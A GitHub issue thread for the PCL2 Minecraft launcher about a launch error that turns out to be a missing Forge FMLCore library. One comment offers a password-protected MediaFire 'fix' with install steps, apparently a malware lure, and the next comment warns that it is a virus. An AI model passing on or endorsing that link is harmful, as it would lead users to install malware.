### ISSUE TITLE
在加载游戏所有程序完毕准备显示窗口时，爆窗口无法显示弹出了错误日志。

### ISSUE THREAD

**Issue by bii20081Aztec** [Hex-Dragon/PCL2#4602]
### 检查项

- [X] 我已在 [Issues 页面](https://github.com/Hex-Dragon/PCL2/issues?q=is%3Aissue+) 和 [常见&难检反馈及问题列表](https://github.com/Hex-Dragon/PCL2/discussions/1930) 中搜索，确认了这一 Bug 未被提交过。

### 描述

在加载游戏所有程序完毕准备显示窗口时，爆窗口无法显示弹出了错误日志。

### 重现步骤

此bug为随机bug无法重现。

### 日志与附件

[Log1.txt](https://github.com/user-attachments/files/16756359/Log1.txt)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zkitefly** [comment]
注意，不要下载这个文件，这个是病毒！

**Comment by JingHai-Lingyun** [comment]
Author 反馈的 `准备显示窗口时，弹出了错误日志` 是因为你的 FMLCore 不存在
```
Caused by: java.io.IOException: Invalid paths argument, contained no existing paths: [D:\PCL2\.minecraft\libraries\net\minecraftforge\fmlcore\1.18.2-40.2.14\fmlcore-1.18.2-40.2.14.jar]
```
解决此问题请重新安装 Forge 版本的客户端

---

上述日志同 #4402 ，综合来看，标记一个重复关掉咯
